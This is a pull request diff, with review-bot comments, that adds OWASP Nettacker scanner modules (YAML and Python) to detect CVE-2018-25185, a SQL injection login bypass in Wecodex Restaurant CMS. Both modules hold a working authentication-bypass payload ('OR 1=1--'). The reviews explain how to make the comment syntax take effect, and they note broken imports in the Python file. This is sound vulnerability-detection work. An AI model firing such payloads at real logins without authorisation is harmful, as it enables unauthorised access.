47 changes: 47 additions & 0 deletions nettacker/modules/vuln/cve_2018_25185.yaml
@@ -0,0 +1,47 @@
info:
name: cve_2018_25185_sqli
author: Gopika
severity: 8
description: SQL Injection vulnerability in Wecodex Restaurant CMS 1.0 via username parameter in /login.php allowing authentication bypass.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25185
profiles:
- vuln
- vulnerability
- http
- high_severity
- cve2018
- cve
- sqli

payloads:
- library: http
steps:
- method: post
timeout: 3
headers:
User-Agent: "{user_agent}"
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/login.php"
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
ports:
- 8080
data:
"username=admin' OR 1=1--&password=test"
Comment on lines +37 to +38

⚠️ Potential issue | 🟡 Minor

Payload inconsistency with companion Python module.

The YAML payload uses username=admin' OR 1=1--&password=test while the Python file (cve_2018_25185_vuln.py line 31) uses username=' OR 1=1--&password=password. Both the username prefix (admin' vs ') and password value (test vs password) differ, which could lead to inconsistent detection results.

Recommend aligning both implementations to use the same payload values.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@nettacker/modules/vuln/cve_2018_25185.yaml` around lines 37 - 38, The YAML
payload in cve_2018_25185.yaml currently uses "username=admin' OR
1=1--&password=test" which conflicts with the Python module
cve_2018_25185_vuln.py that sends "username=' OR 1=1--&password=password";
update one of them so both use the exact same payload string (choose which
canonical payload to keep, e.g., "username=' OR 1=1--&password=password" or
"username=admin' OR 1=1--&password=test") and ensure both the YAML entry and the
payload construction in cve_2018_25185_vuln.py match exactly to avoid
inconsistent detection.

response:
condition_type: and
conditions:
status_code:
regex: "200"
reverse: false
content:
regex: "Welcome admin dashboard"
reverse: false
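Review bot: the `response` condition at the end of this module (status code `200` AND body matching `Welcome admin dashboard`) is hard to satisfy given `allow_redirects: false` higher up in the same step. A login that succeeds on a typical PHP CMS answers with a 301/302 to the post-login page, so a real bypass would come back as a 3xx with little or no body and the module would report a false negative; either allow redirects for this step or also accept a 3xx whose `Location` points at the dashboard. Two smaller points on the request: `ports` lists only `8080` and `schema` only `http`, so a CMS served on 80/443 is never exercised; and in `"username=admin' OR 1=1--&password=test"` the `--` is immediately followed by the closing quote the application appends, which MySQL (the usual pairing for a PHP CMS, though the page does not say) only treats as a comment when whitespace follows the dashes. Use `-- ` (URL-encoded `--+`) or `#` (`%23`) so the trailing `AND password=...` clause is really commented out.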
52 changes: 52 additions & 0 deletions nettacker/modules/vuln/cve_2018_25185_vuln.py
@@ -0,0 +1,52 @@
"""
cve_2018_25185_vuln.py
----------------------
Author: K. Gopika
Description: OWASP Nettacker module to detect CVE-2018-25185
(SQL Injection in Wecodex Restaurant CMS 1.0)
Version: 1.0

Detection Logic:
- Sends a POST request to /login.php
- Injects a simple SQL payload: "' OR 1=1--"
- Checks for response behavior indicative of SQL injection
- Does NOT perform any destructive actions
"""

import requests
from modules.core import *
from modules import print_good, print_error
Comment on lines +16 to +18

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Verify the correct import paths in Nettacker
echo "=== Check package structure ==="
fd -t d -d 2 . nettacker/

echo ""
echo "=== Check how other modules import core functionality ==="
rg -n "^from nettacker" nettacker/modules/ | head -20

echo ""
echo "=== Check if modules.core exists ==="
fd -p "modules/core" nettacker/

Repository: OWASP/Nettacker

Length of output: 561


🏁 Script executed:

#!/bin/bash
# Check actual import patterns in modules directory
echo "=== Import patterns in nettacker/modules/ (sample) ==="
rg -n "^(from|import)" nettacker/modules/ | head -30

echo ""
echo "=== Check the specific file content ==="
cat -n nettacker/modules/vuln/cve_2018_25185_vuln.py | head -25

Repository: OWASP/Nettacker

Length of output: 1256


🏁 Script executed:

#!/bin/bash
# Find where print_good and print_error are defined
echo "=== Search for print_good and print_error definitions ==="
rg -n "def print_good|def print_error" nettacker/

echo ""
echo "=== Check __init__.py files ==="
find nettacker/ -name "__init__.py" -type f

echo ""
echo "=== Check if modules directory has __init__.py ==="
ls -la nettacker/modules/__init__.py 2>&1

echo ""
echo "=== Check all imports using modules. pattern ==="
rg -n "from modules\.|import modules" nettacker/ | head -20

Repository: OWASP/Nettacker

Length of output: 860


🏁 Script executed:

#!/bin/bash
# Search more broadly for print_good and print_error
echo "=== Search for print_good everywhere ==="
rg "print_good" nettacker/ | head -20

echo ""
echo "=== Check a sample of other vuln module imports ==="
head -30 nettacker/modules/vuln/cve_2021_3177_vuln.py 2>/dev/null || head -30 nettacker/modules/scan/*.py 2>/dev/null | head -40

echo ""
echo "=== List some vuln module files ==="
ls nettacker/modules/vuln/ | head -10

echo ""
echo "=== Check core __init__.py for exported functions ==="
head -50 nettacker/core/__init__.py

Repository: OWASP/Nettacker

Length of output: 757


🏁 Script executed:

#!/bin/bash
# Find all Python files in modules
echo "=== All .py files in nettacker/modules/ ==="
find nettacker/modules/ -name "*.py" -type f

echo ""
echo "=== Full content of core/__init__.py ==="
cat nettacker/core/__init__.py

echo ""
echo "=== Check main.py for sys.path setup ==="
grep -n "sys.path\|insert\|append" nettacker/main.py | head -20

echo ""
echo "=== Check if modules package exists anywhere ==="
find . -maxdepth 2 -name "modules" -type d

Repository: OWASP/Nettacker

Length of output: 302


Fix invalid imports that will cause runtime failure.

The imports are incorrect for Nettacker's package structure:

  • `from modules.core import *`: modules.core doesn't exist; should be `from nettacker.core import *`
  • `from modules import print_good, print_error`: print_good and print_error don't exist in the codebase

Additionally, the wildcard import makes it impossible to determine what names are being imported and is flagged by static analysis (F403).

🧰 Tools
🪛 Ruff (0.15.7)

[error] 17-17: from modules.core import * used; unable to detect undefined names

(F403)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@nettacker/modules/vuln/cve_2018_25185_vuln.py` around lines 16 - 18, Replace
the invalid and wildcard imports: remove "from modules.core import *" and "from
modules import print_good, print_error" and instead import only the specific
names used in this file from the correct package path (e.g., "from
nettacker.core import <ExactNamesUsed>" or other specific functions/classes),
and remove or replace references to non-existent print_good/print_error with the
actual logging/util functions present in the codebase; locate usages of
print_good and print_error in cve_2018_25185_vuln.py and swap them to the
correct functions (or import the correct symbols) so there are no wildcard
imports and no imports from non-existent modules.


# Module metadata for Nettacker
MODULE_NAME = "cve_2018_25185_vuln"
MODULE_DESCRIPTION = "Detects CVE-2018-25185 SQLi in Wecodex Restaurant CMS"
MODULE_AUTHOR = "K. Gopika"
MODULE_VERSION = "1.0"

def scan(target_ip, target_port):
"""
Main scan function for the module
"""
url = f"http://{target_ip}:{target_port}/login.php"
payload = {"username": "' OR 1=1--", "password": "password"}

try:
response = requests.post(url, data=payload, timeout=5)

# Check for conditions indicating SQLi
if "Welcome admin dashboard" in response.text and response.status_code == 200:
print_good(f"[+] {target_ip}:{target_port} is vulnerable (CVE-2018-25185)")
return {"target": target_ip, "port": target_port, "status": "Detected"}
else:
print_error(f"[-] {target_ip}:{target_port} appears safe")
return {"target": target_ip, "port": target_port, "status": "Not Detected"}

except requests.exceptions.RequestException as e:
print_error(f"[!] Error connecting to {url}: {e}")
return {"target": target_ip, "port": target_port, "status": "Error"}

# Entry point for manual testing
if __name__ == "__main__":
target_ip = input("Enter target IP: ")
target_port = input("Enter target port: ")
scan(target_ip, target_port)
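Review bot: `scan()` reports both the not-vulnerable case and the connection-error case through `print_error`, so a reader of the output cannot tell "appears safe" from "could not connect"; use a neutral message for the negative result and keep the error path for the `RequestException` branch. The check also diverges from the companion YAML in more than the payload string already noted above: `requests.post` follows redirects by default, so a 302 to the dashboard is turned into a GET whose body may well contain `Welcome admin dashboard` with status 200, whereas the YAML step disables redirects and would see the 302; the two implementations will disagree on the same target. `url` hard-codes `http://`, so a TLS-only deployment cannot be tested, and the `--` in `"' OR 1=1--"` needs a trailing space (or `#`) to be honoured by MySQL once the application appends its own closing quote. Lastly the `__main__` block passes `target_port` straight from `input()`; the f-string copes with the string, but the returned dict then carries a string port, so cast it with `int()` before calling `scan()`.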